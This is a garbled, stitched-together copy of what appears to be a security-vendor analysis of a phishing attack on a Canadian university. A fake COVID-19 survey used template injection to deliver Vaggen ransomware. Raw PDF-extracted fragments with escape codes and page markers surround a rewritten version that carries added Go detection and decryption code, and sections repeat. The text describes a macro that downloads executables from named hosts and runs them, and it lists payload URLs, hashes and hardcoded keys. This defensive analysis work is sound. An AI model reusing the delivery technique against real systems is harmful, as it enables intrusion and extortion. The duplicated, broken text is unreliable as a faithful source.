the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). 
At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2008 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2009 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2010 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2011 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. 
The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2012 of 
3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2013 of 
3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nGood evening gals and guys! [redacted] here, [redacted] manager for [redacted]. I am sharing a\r\nmandatory survey with you that must be completed by Monday. It asks a few questions about how you\r\nbelieve our company responded to the pandemic regarding remote working and much more. 
Please fill\r\nit out ASAP!\r\nYou will also find a form at the end that you can fill out if you need any necessities! Necessities\r\ninclude: gloves, hand sanitizer, masks, or disinfectant spray. We will be providing it to those employees\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2014 of 3467\n\nwho fill out the form for free! Simply sign your initials and put what you need as well as the quantity!\r\nIn advance, we appreciate your feedback! Thanks all! Stay strong! I understand times like this can be\r\ndifficult!\r\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. 
That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2015 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2016 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. 
This post was authored by Jérôme Segura with contributions from Hossein Jazi, Hasherezade and Marcelo Rivero.

In recent weeks, we've observed a number of phishing attacks against universities worldwide which we attributed to the Silent Librarian APT group.
On October 19, we identified a new phishing document targeting staff at the University of British Columbia (UBC) with a fake COVID-19 survey.

However, this attack and its motives differ from those previously documented. The survey is a malicious Word document whose purpose is to download ransomware and extort victims in exchange for their encrypted files.

On discovery, we got in touch with UBC to report our findings. They were already aware of this phishing campaign and were kind enough to share more information with us about the incident. Ultimately, the attack was not successful, thanks to the rapid response of the UBC cybersecurity team.

Mandatory COVID-19 survey distributed to targeted recipients

The attacker created an email address with the mailpoof.com service in order to register accounts with Box.net and Dropbox. Rather than sending the fake survey directly by email, the attacker uploaded the document to Box and Dropbox and used the share functionality of these platforms to distribute it.

This was probably done to evade spam and phishing filters that would have blocked messages coming from a newly registered email address with a low reputation. By comparison, it is much harder to detect spam originating from file-sharing services without generating many false positives, since the share notifications are sent by the legitimate service rather than from the attacker's mailbox.

The attacker claimed to be a manager and added the following comment to the file-sharing invitation (shared with us by UBC):

Good evening gals and guys! [redacted] here, [redacted] manager for [redacted]. I am sharing a mandatory survey with you that must be completed by Monday. It asks a few questions about how you believe our company responded to the pandemic regarding remote working and much more. Please fill it out ASAP!

You will also find a form at the end that you can fill out if you need any necessities! Necessities include: gloves, hand sanitizer, masks, or disinfectant spray. We will be providing it to those employees who fill out the form for free! Simply sign your initials and put what you need as well as the quantity!

In advance, we appreciate your feedback! Thanks all! Stay strong! I understand times like this can be difficult!

According to UBC, fewer than a hundred people within a specific department received the link to the shared document. A Box or Dropbox account was required to download the file, since it was shared privately rather than publicly. This may have been an effort to evade detection, or perhaps the attacker expected the target organization to already be using one of these two sharing services.

Phishing document analysis

The phishing document uses template injection to download and execute a remote template (template.dotm) weaponized with a malicious macro. Because the macro lives in the remote template rather than in the document itself, the .docx that recipients download contains no VBA for a mail gateway or scanner to flag; the malicious code is only fetched when the document is opened.
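One way to check a suspicious .docx for this technique before opening it, as an added example that is not code from the original post or from Malwarebytes: a .docx is a zip container, and an injected remote template appears as an attachedTemplate relationship in word/_rels/settings.xml.rels whose Target is an http(s) URL. The Go program below parses that part. The documents it builds in memory, and the template URLs they carry, are constructed for the demonstration and are not the real sample.

```go
package main

import (
	"archive/zip"
	"bytes"
	"encoding/xml"
	"fmt"
	"strings"
)

// Minimal model of an OOXML .rels part: a list of <Relationship> elements.
type relationship struct {
	ID         string `xml:"Id,attr"`
	Type       string `xml:"Type,attr"`
	Target     string `xml:"Target,attr"`
	TargetMode string `xml:"TargetMode,attr"`
}

type relationships struct {
	XMLName xml.Name       `xml:"Relationships"`
	Rels    []relationship `xml:"Relationship"`
}

// Relationship type Word uses to point a document at its attached (.dotm)
// template; it lives in word/_rels/settings.xml.rels.
const attachedTemplateType = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate"

// isRemote reports whether a target is fetched over HTTP(S). A legitimately
// attached local template (file:///...Normal.dotm) also carries
// TargetMode="External", so the URL scheme, not TargetMode, is the signal.
func isRemote(target string) bool {
	t := strings.ToLower(strings.TrimSpace(target))
	return strings.HasPrefix(t, "http://") || strings.HasPrefix(t, "https://")
}

// findRemoteTemplates opens a .docx from memory, parses every .rels part and
// returns the targets of attachedTemplate relationships that point at a
// remote URL, i.e. the template-injection pattern.
func findRemoteTemplates(docx []byte) ([]string, error) {
	zr, err := zip.NewReader(bytes.NewReader(docx), int64(len(docx)))
	if err != nil {
		return nil, fmt.Errorf("not a zip/OOXML container: %w", err)
	}
	var hits []string
	for _, f := range zr.File {
		if !strings.HasSuffix(strings.ToLower(f.Name), ".rels") {
			continue
		}
		rc, err := f.Open()
		if err != nil {
			return nil, err
		}
		var rels relationships
		err = xml.NewDecoder(rc).Decode(&rels)
		rc.Close()
		if err != nil {
			return nil, fmt.Errorf("%s: %w", f.Name, err)
		}
		for _, r := range rels.Rels {
			if r.Type == attachedTemplateType && isRemote(r.Target) {
				hits = append(hits, r.Target)
			}
		}
	}
	return hits, nil
}

// buildDocx constructs a minimal .docx in memory for the demonstration (not a
// real sample). templateTarget is embedded unescaped, so keep it XML-safe.
func buildDocx(templateTarget string) ([]byte, error) {
	rels := `<?xml version="1.0" encoding="UTF-8" standalone="yes"?>` +
		`<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">` +
		`<Relationship Id="rId1" Type="` + attachedTemplateType + `" Target="` + templateTarget + `" TargetMode="External"/>` +
		`</Relationships>`
	parts := map[string]string{
		"[Content_Types].xml":          `<?xml version="1.0" encoding="UTF-8"?><Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>`,
		"word/document.xml":            `<?xml version="1.0" encoding="UTF-8"?><w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main"><w:body/></w:document>`,
		"word/_rels/settings.xml.rels": rels,
	}
	var buf bytes.Buffer
	zw := zip.NewWriter(&buf)
	for name, body := range parts {
		w, err := zw.Create(name)
		if err != nil {
			return nil, err
		}
		if _, err := w.Write([]byte(body)); err != nil {
			return nil, err
		}
	}
	if err := zw.Close(); err != nil {
		return nil, err
	}
	return buf.Bytes(), nil
}

func main() {
	// Constructed targets: a hypothetical injected URL and a benign local template.
	samples := map[string]string{
		"injected": "https://example.invalid/Word-Templates/raw/master/template.dotm",
		"benign":   "file:///C:/Users/victim/AppData/Roaming/Microsoft/Templates/Normal.dotm",
	}
	for label, target := range samples {
		doc, err := buildDocx(target)
		if err != nil {
			panic(err)
		}
		hits, err := findRemoteTemplates(doc)
		if err != nil {
			panic(err)
		}
		fmt.Printf("%-8s remote templates: %v\n", label, hits)
	}
}
```

The scheme check matters: Word records a normally attached Normal.dotm as a file:/// target with TargetMode="External", so flagging on TargetMode alone would light up every document from a managed Office build.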
The remote template was uploaded to a free code hosting website (notabug.org).

When the macro is executed, it does the following:

- Gets the %APPDATA% directory
- Creates the Byxor directory in %APPDATA%
- Downloads a file from notabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe and writes it as Polisen.exe
- Downloads a file from notabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe and writes it as Killar.exe
- Calls the Shell function to execute Killar.exe
- Checks the return value of Shell to see whether the launch succeeded (on success, the return value is the task ID of the executed application)
- If successful, sends an HTTP GET request to canarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp
- If not successful, sends an HTTP GET request to canarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html

We were able to identify four other variants of the remote templates and payloads. In some of the folders, we found several artifacts using Swedish words, which could indicate that the threat actor is familiar with the language.

Opening the phishing document triggers a notification via the canarytokens.com website. Typically, people use this type of service to be alerted when a particular event occurs; it is useful defensively as an early warning that an intruder has gained access to a network.
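The macro steps above (Word writing two executables into a fresh %APPDATA%\Byxor directory, launching one of them, then beaconing to canarytokens.com) are exactly what host telemetry can key on. The following Go program is an added example, not code from the original post or from Malwarebytes: it runs one such rule, an Office application spawning an executable from under %APPDATA%, over constructed Sysmon-style process-creation events. The JSON shape and the file paths are assumptions made for the demonstration.

```go
package main

import (
	"encoding/json"
	"fmt"
	"strings"
)

// procEvent is the subset of a Sysmon Event ID 1 (process creation) record the
// rule needs. Field names follow Sysmon's; the JSON shape is a simplification.
type procEvent struct {
	EventID     int    `json:"EventID"`
	ParentImage string `json:"ParentImage"`
	Image       string `json:"Image"`
	CommandLine string `json:"CommandLine"`
}

// Constructed sample events (not real telemetry). The first mirrors the macro:
// WINWORD.EXE launching a just-dropped binary from %APPDATA%\Byxor. The second
// is a legitimate Office child, the third a user app from Roaming started by
// Explorer, the fourth a non-process-creation event for the same binary.
var sampleEvents = []string{
	`{"EventID":1,"ParentImage":"C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE","Image":"C:\\Users\\victim\\AppData\\Roaming\\Byxor\\Killar.exe","CommandLine":"Killar.exe"}`,
	`{"EventID":1,"ParentImage":"C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE","Image":"C:\\Windows\\splwow64.exe","CommandLine":"splwow64.exe 12288"}`,
	`{"EventID":1,"ParentImage":"C:\\Windows\\explorer.exe","Image":"C:\\Users\\victim\\AppData\\Roaming\\Spotify\\Spotify.exe","CommandLine":"Spotify.exe"}`,
	`{"EventID":3,"ParentImage":"","Image":"C:\\Users\\victim\\AppData\\Roaming\\Byxor\\Killar.exe","CommandLine":""}`,
}

// officeParents are the Office hosts whose child processes are scrutinised.
var officeParents = map[string]bool{"winword.exe": true, "excel.exe": true, "powerpnt.exe": true}

// baseName returns the file name of a Windows path regardless of host OS
// (path/filepath.Base does not split on backslashes on Linux).
func baseName(p string) string {
	if i := strings.LastIndexAny(p, `\/`); i >= 0 {
		return p[i+1:]
	}
	return p
}

// isOfficeDroppedChild encodes the rule: an Office application spawning an
// executable under %APPDATA% (...\AppData\Roaming\...). Matching is
// case-insensitive because NTFS paths are.
func isOfficeDroppedChild(e procEvent) bool {
	if e.EventID != 1 {
		return false
	}
	parent := strings.ToLower(baseName(e.ParentImage))
	image := strings.ToLower(e.Image)
	return officeParents[parent] && strings.Contains(image, `\appdata\roaming\`)
}

// flagOfficeSpawns parses JSON event lines and returns the Image path of every
// matching event. A malformed line is an error rather than a silent skip, so a
// broken log pipeline cannot hide a hit.
func flagOfficeSpawns(lines []string) ([]string, error) {
	var hits []string
	for n, line := range lines {
		var e procEvent
		if err := json.Unmarshal([]byte(line), &e); err != nil {
			return nil, fmt.Errorf("line %d: %w", n+1, err)
		}
		if isOfficeDroppedChild(e) {
			hits = append(hits, e.Image)
		}
	}
	return hits, nil
}

func main() {
	hits, err := flagOfficeSpawns(sampleEvents)
	if err != nil {
		panic(err)
	}
	for _, h := range hits {
		fmt.Printf("ALERT office-spawned binary under %%APPDATA%%: %s\n", h)
	}
}
```

Only the Killar.exe launch matches: the rule keys on the parent/child relationship and the drop location, not on the Byxor name or the file hashes, so it still fires when the actor renames the folder or rebuilds the payloads.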
In this case, the attacker is probably interested in how many people opened the document and perhaps where they are from.

Vaggen ransomware

Once deployed, the ransomware starts encrypting the user's files, adding the .VAGGEN extension to each of them. When the encryption process is finished, it drops a ransom note on the Desktop demanding a payment equivalent to 80 USD in Bitcoin.

The ransomware appears to be coded from scratch and is a relatively straightforward application written in Go whose entry point is the function denoted as 'main_main'.

Other functions belonging to the main application have obfuscated names, such as main_FOLOJVAG, main_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA and main_SPRINGA. Their roles are:

main_LAMNARDETTA -> main_enumDir
main_ELDBJORT -> main_encryptFile
main_SPRINGA -> main_encryptAndRen

A full list of the functions, along with their RVAs, can be found here.

Some of the strings used by the malware (for example the content of the ransom note) are encrypted with XXTEA (using the xxtea-go library). Each encrypted chunk is first decoded from Base64, then decrypted with the hardcoded XXTEA key "STALKER". At the end of execution, the ransom note is dropped on the Desktop.

Encryption and renaming of the files is implemented as the callback of the standard Go function path/filepath.Walk.

Files are encrypted with AES-256 (32-byte key) in GCM mode. The encryption routine is similar to the one demonstrated here: it uses a hardcoded key and a 12-byte nonce generated by CryptGenRandom, and encrypts the file content with the gcm.Seal function.

The output file (with the .VAGGEN extension) consists of:

the 12-byte nonce
the encrypted content
the 16-byte GCM tag

The hardcoded key "du_tar_mitt_hjart_mina_pengarna0" found inside the malware code is Swedish for "you take my heart my money". Using this key, we can easily decrypt the content. Because the key is embedded in the binary rather than generated per victim and sent to the attacker, the same key opens every file the sample encrypted, and the GCM tag lets a decryptor confirm the key is right instead of producing garbage.

With all these elements, we can recover encrypted files without paying the ransom. It appears that the malware author has not received any payment so far at this Bitcoin address.

Unusually low ransom amount

Based on our findings, we believe this is not a sophisticated threat actor, nor one affiliated with any of the big ransomware gangs such as Ryuk. The ransom amount is unusually low and, unlike professional ransomware, this attack can be recovered from fairly easily.

However, the phishing attack was well conceived and the template looks well designed, with the nice touch of adding canary tokens. It's unclear at this point whether the University of British Columbia was the sole target.

Crawling additional repositories created by the threat actor, we found other Word template files that used a very similar macro to drop a coin miner. This raises more questions about the motivation behind this phishing attack.

We are grateful for the information shared with us by the University of British Columbia.
This allowed us to paint a better picture of this attack and understand who the targets were.

Malwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.

IOCs

All hashes are SHA-256; hostnames are defanged.

Variant 1:
summerofficetemplate.dotm
634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4
notabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe
notabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe
canarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html
canarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html
alderson.exe
34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5
irving.exe
00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe

Variant 2:
UBC-COVID19-Survey-Mandatory.docx
e869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3
template.dotm
334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1
notabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe
notabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe
canarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp
canarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html
polisen.exe
03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf
killar.exe
43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f

Variant 3:
template1.dotm
225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4
notabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe
notabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe
canarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php
canarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp

Variant 4:
smoothtemplates.dotm
ada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1
notabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe
notabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe
canarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html
canarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html
alderson.exe
b4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6
irving.exe
00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe

Variant 5:
template.dotm
7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4
notabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe
notabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe
canarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp
canarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php
mrmonster.exe
f42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23
mrclean.exe
71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a
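Putting the layout described in the Vaggen ransomware section (12-byte nonce, ciphertext, 16-byte GCM tag) together with the hardcoded key gives a decryptor. The Go program below is an added example, not the malware's code or a Malwarebytes tool. It assumes the 32-byte ASCII string reported in the write-up is used directly as the AES-256 key; the sealVaggen helper exists only to produce a sample .VAGGEN body for the demonstration, and the plaintext it encrypts is constructed.

```go
package main

import (
	"crypto/aes"
	"crypto/cipher"
	"crypto/rand"
	"errors"
	"fmt"
	"io"
)

// Key recovered from the binary, as reported in the write-up. It is exactly
// 32 bytes, so it is assumed here to be the raw AES-256 key.
const vaggenKey = "du_tar_mitt_hjart_mina_pengarna0"

const (
	nonceSize = 12 // standard GCM nonce, as described in the write-up
	tagSize   = 16 // GCM tag, appended to the ciphertext by gcm.Seal
)

// newGCM builds the AES-256-GCM AEAD from a 32-byte key.
func newGCM(key []byte) (cipher.AEAD, error) {
	if len(key) != 32 {
		return nil, fmt.Errorf("expected a 32-byte AES-256 key, got %d bytes", len(key))
	}
	block, err := aes.NewCipher(key)
	if err != nil {
		return nil, err
	}
	return cipher.NewGCM(block)
}

// sealVaggen reproduces the on-disk layout nonce || ciphertext || tag so the
// example can build a sample body. It is a demonstration helper only.
func sealVaggen(key, plaintext []byte) ([]byte, error) {
	gcm, err := newGCM(key)
	if err != nil {
		return nil, err
	}
	nonce := make([]byte, nonceSize)
	if _, err := io.ReadFull(rand.Reader, nonce); err != nil { // the malware used CryptGenRandom
		return nil, err
	}
	// Seal appends ciphertext and the 16-byte tag to dst; passing the nonce as
	// dst yields exactly nonce || ciphertext || tag.
	return gcm.Seal(nonce, nonce, plaintext, nil), nil
}

// openVaggen recovers the plaintext of a .VAGGEN file body. A wrong key, a
// truncated file or a modified byte fails authentication and returns an error
// instead of garbage, so the first run on a sample also tells you whether it
// really uses the hardcoded key.
func openVaggen(key, blob []byte) ([]byte, error) {
	if len(blob) < nonceSize+tagSize {
		return nil, errors.New("file too short to hold a nonce and a GCM tag")
	}
	gcm, err := newGCM(key)
	if err != nil {
		return nil, err
	}
	nonce, ct := blob[:nonceSize], blob[nonceSize:]
	pt, err := gcm.Open(nil, nonce, ct, nil)
	if err != nil {
		return nil, fmt.Errorf("authentication failed (wrong key or corrupted file): %w", err)
	}
	return pt, nil
}

func main() {
	key := []byte(vaggenKey)
	// Constructed content standing in for a victim's file.
	original := []byte("Q3 budget spreadsheet (constructed sample)")
	blob, err := sealVaggen(key, original)
	if err != nil {
		panic(err)
	}
	fmt.Printf("encrypted .VAGGEN body: %d bytes (12 nonce + %d data + 16 tag)\n", len(blob), len(original))

	recovered, err := openVaggen(key, blob)
	if err != nil {
		panic(err)
	}
	fmt.Printf("recovered: %q\n", recovered)

	// Flipping one ciphertext bit is detected by the tag, as is any other key.
	blob[nonceSize] ^= 0x01
	if _, err := openVaggen(key, blob); err != nil {
		fmt.Println("tampered file rejected:", err)
	}
}
```

Against a real .VAGGEN file, read the whole file into blob, call openVaggen with the key, and write the result back under the original name (strip the .VAGGEN suffix). Keep the encrypted copies until the recovered files have been checked, since a tag failure on even one file indicates a different build or key.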
of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2062 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. 
When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2063 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2064 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM 